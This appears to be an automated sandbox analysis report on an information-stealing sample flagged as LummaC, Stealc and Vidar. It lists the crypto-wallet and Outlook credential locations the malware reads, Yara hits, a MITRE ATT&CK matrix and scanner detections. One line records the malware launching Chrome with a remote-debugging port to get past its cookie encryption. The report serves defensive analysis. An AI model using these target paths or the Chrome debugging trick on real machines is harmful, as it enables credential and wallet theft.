Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents\JDDHMPCDUJ
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents\NYMMPCEIMA
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents\NYMMPCEIMA
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents\QFAPOWPAFG
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents\JDDHMPCDUJ
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents\JDDHMPCDUJ
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents\NYMMPCEIMA
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents\LHEPQPGEWF
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents\QFAPOWPAFG
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents\UNKRLCVOHV
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents\LHEPQPGEWF
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents\LHEPQPGEWF
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents\NYMMPCEIMA
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents\QFAPOWPAFG
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents\QFAPOWPAFG
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents\UNKRLCVOHV
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents\HMPPSXQPQV
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents\HMPPSXQPQV
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Directory queried: C:\Users\user\Documents

Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe

Directory queried: number of queries: 2044

Source: Yara match	File source: 00000018.00000003.2774204257.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.2921265886.000000000134B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.2773461300.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.2773690281.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.3002870912.0000000001363000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.2800114714.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.3166497243.0000000000ECD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.2996193043.0000000001355000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.2814219550.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.2938921647.000000000134A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.3176586862.0000000000ECC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.2799388464.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.2784188124.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.2940811405.0000000001355000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.3212224215.0000000000ED8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.2799292941.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.2814302545.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.2921839875.000000000134E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.3002358113.0000000001357000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.2920552958.000000000134A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.2811596703.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.2783959040.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.2811136383.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.3204213691.0000000000ED0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.2939046647.0000000001355000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.2811767989.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 984, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 167c7bdf2f.exe PID: 7824, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 167c7bdf2f.exe PID: 7848, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 167c7bdf2f.exe PID: 2888, type: MEMORYSTR

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: 167c7bdf2f.exe PID: 7824, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 167c7bdf2f.exe PID: 7848, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 167c7bdf2f.exe PID: 2888, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected Stealc

Source: Yara match	File source: 29.2.167c7bdf2f.exe.5a57979.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001F.00000002.3008594002.0000000001B9B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.3081849711.00000000085A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2826853766.000000000070E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2412394871.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.3007450920.0000000000FD1000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.3134859442.0000000006081000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2901825216.000000000149B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.3254080654.0000000000FD1000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2411289868.0000000000751000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2894025783.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.2786060868.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.3253411166.0000000000CDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.3129335841.00000000012F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.3212643969.0000000005210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.2967174557.00000000058A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2036396995.0000000005100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.2853526780.0000000005260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2827858049.0000000000FD1000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 984, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: d77e539f5f.exe PID: 8408, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: skotes.exe PID: 9056, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 167c7bdf2f.exe PID: 7848, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: d77e539f5f.exe PID: 1888, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: d77e539f5f.exe PID: 2124, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: Process Memory Space: file.exe PID: 984, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 167c7bdf2f.exe PID: 7848, type: MEMORYSTR

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C840C40 sqlite3_bind_zeroblob,	0_2_6C840C40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C840D60 sqlite3_bind_parameter_name,	0_2_6C840D60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C768EA0 sqlite3_clear_bindings,	0_2_6C768EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C840B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	0_2_6C840B40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C766410 bind,WSAGetLastError,	0_2_6C766410

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	41 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	41 Disable or Modify Tools	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Native API	1 Scheduled Task/Job	2 Bypass User Account Control	21 Deobfuscate/Decode Files or Information	LSASS Memory	22 File and Directory Discovery	Remote Desktop Protocol	41 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	111 Registry Run Keys / Startup Folder	1 Extra Window Memory Injection	4 Obfuscated Files or Information	Security Account Manager	258 System Information Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Remote Access Software	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	Login Hook	112 Process Injection	12 Software Packing	NTDS	1 Query Registry	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	2 PowerShell	Network Logon Script	1 Scheduled Task/Job	1 DLL Side-Loading	LSA Secrets	891 Security Software Discovery	SSH	Keylogging	114 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	111 Registry Run Keys / Startup Folder	2 Bypass User Account Control	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Extra Window Memory Injection	DCSync	381 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	121 Masquerading	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	381 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	112 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[2].exe	37%	ReversingLabs	Win32.Infostealer.Tinba
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	0%	ReversingLabs
